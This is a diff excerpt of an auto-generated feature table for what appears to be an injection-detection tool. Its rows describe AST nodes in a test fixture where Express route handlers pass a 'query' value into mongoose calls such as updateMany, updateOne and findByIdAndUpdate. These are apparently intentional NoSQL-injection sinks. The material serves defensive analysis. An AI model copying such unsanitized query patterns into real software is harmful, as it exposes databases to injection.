enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:30 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:30 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:30 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:30 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:5:60:30 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:14:60:23 | updateMany | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:14:60:23 | updateMany | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:14:60:23 | updateMany | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:14:60:23 | updateMany | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:25:60:29 | query | CalleeFlexibleAccessPath | Document.updateMany | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:25:60:29 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:25:60:29 | query | calleeImports | mongoose | @@ -2344,6 +12291,38 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:25:60:29 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:25:60:29 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:60:25:60:29 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:19 | Document.updateOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:19 | Document.updateOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:19 | Document.updateOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:19 | Document.updateOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:26 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:26 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:26 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:26 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:26 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:26 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:26 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:26 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:31 | Documen ... y).then | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:31 | Documen ... y).then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:31 | Documen ... y).then | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:31 | Documen ... y).then | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:34 | Documen ... then(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:34 | Documen ... then(X) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:34 | Documen ... then(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:34 | Documen ... then(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:34 | exceptional return of Documen ... then(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:34 | exceptional return of Documen ... then(X) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:34 | exceptional return of Documen ... then(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:2:63:34 | exceptional return of Documen ... then(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:11:63:19 | updateOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:11:63:19 | updateOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:11:63:19 | updateOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:11:63:19 | updateOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:21:63:25 | query | CalleeFlexibleAccessPath | Document.updateOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:21:63:25 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:21:63:25 | query | calleeImports | mongoose | @@ -2352,6 +12331,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:21:63:25 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:21:63:25 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:21:63:25 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:28:63:31 | then | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:28:63:31 | then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:28:63:31 | then | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:28:63:31 | then | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:33:63:33 | X | CalleeFlexibleAccessPath | Document.updateOne().then | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:33:63:33 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:33:63:33 | X | calleeImports | mongoose | @@ -2359,6 +12342,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:33:63:33 | X | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:33:63:33 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:63:33:63:33 | X | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:27 | Documen ... dUpdate | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:27 | Documen ... dUpdate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:27 | Documen ... dUpdate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:27 | Documen ... dUpdate | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:51 | Documen ... on(){}) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:51 | Documen ... on(){}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:51 | Documen ... on(){}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:51 | Documen ... on(){}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:51 | exceptional return of Documen ... on(){}) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:51 | exceptional return of Documen ... on(){}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:51 | exceptional return of Documen ... on(){}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:2:65:51 | exceptional return of Documen ... on(){}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:11:65:27 | findByIdAndUpdate | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:11:65:27 | findByIdAndUpdate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:11:65:27 | findByIdAndUpdate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:11:65:27 | findByIdAndUpdate | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:29:65:29 | X | CalleeFlexibleAccessPath | Document.findByIdAndUpdate | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:29:65:29 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:29:65:29 | X | calleeImports | mongoose | @@ -2375,6 +12378,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:32:65:36 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:32:65:36 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:32:65:36 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:38 | this | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:38 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:38 | this | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:38 | this | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | exceptional return of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | function(){} | CalleeFlexibleAccessPath | Document.findByIdAndUpdate | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | function(){} | InputArgumentIndex | 2 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | function(){} | calleeImports | mongoose | @@ -2383,6 +12398,42 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | function(){} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | function(){} | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | function(){} | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:65:39:65:50 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:67:32 | exceptional return of new Mon ... query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:67:32 | exceptional return of new Mon ... query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:67:32 | exceptional return of new Mon ... query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:67:32 | exceptional return of new Mon ... query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:67:32 | new Mon ... query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:67:32 | new Mon ... query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:67:32 | new Mon ... query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:67:32 | new Mon ... query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:68:6 | new Mon ... \\n\\t\\t.and | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:68:6 | new Mon ... \\n\\t\\t.and | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:68:6 | new Mon ... \\n\\t\\t.and | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:68:6 | new Mon ... \\n\\t\\t.and | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:68:27 | exceptional return of new Mon ... on(){}) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:68:27 | exceptional return of new Mon ... on(){}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:68:27 | exceptional return of new Mon ... on(){}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:68:27 | exceptional return of new Mon ... on(){}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:68:27 | new Mon ... on(){}) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:68:27 | new Mon ... on(){}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:68:27 | new Mon ... on(){}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:2:68:27 | new Mon ... on(){}) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:6:67:13 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:6:67:13 | Mongoose | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:6:67:13 | Mongoose | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:6:67:13 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:6:67:19 | Mongoose.Query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:6:67:19 | Mongoose.Query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:6:67:19 | Mongoose.Query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:6:67:19 | Mongoose.Query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:15:67:19 | Query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:15:67:19 | Query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:15:67:19 | Query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:15:67:19 | Query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:21:67:21 | X | CalleeFlexibleAccessPath | Mongoose.Query | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:21:67:21 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:21:67:21 | X | calleeImports | mongoose | @@ -2404,6 +12455,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:27:67:31 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:27:67:31 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:67:27:67:31 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:4:68:6 | and | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:4:68:6 | and | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:4:68:6 | and | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:4:68:6 | and | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:8:68:12 | query | CalleeFlexibleAccessPath | Mongoose.Query().and | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:8:68:12 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:8:68:12 | query | calleeImports | mongoose | @@ -2411,6 +12466,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:8:68:12 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:8:68:12 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:8:68:12 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:14 | this | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:14 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:14 | this | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:14 | this | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | exceptional return of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | function(){} | CalleeFlexibleAccessPath | Mongoose.Query().and | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | function(){} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | function(){} | calleeImports | mongoose | @@ -2418,6 +12485,114 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | function(){} | contextSurroundingFunctionParameters | (req, res)\n() | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | function(){} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | function(){} | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:68:15:68:26 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:18 | Document.where | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:18 | Document.where | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:18 | Document.where | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:18 | Document.where | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:25 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:25 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:25 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:25 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:25 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:25 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:25 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:71:25 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:72:14 | Documen ... .where | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:72:14 | Documen ... .where | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:72:14 | Documen ... .where | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:72:14 | Documen ... .where | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:72:21 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:72:21 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:72:21 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:72:21 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:72:21 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:72:21 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:72:21 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:72:21 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:73:6 | Documen ... \\n\\t\\t.and | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:71:5:73:6 | Documen ... \\n\\t\\t.and | contextSurroundingFunctionParameters | (req, res) | +| 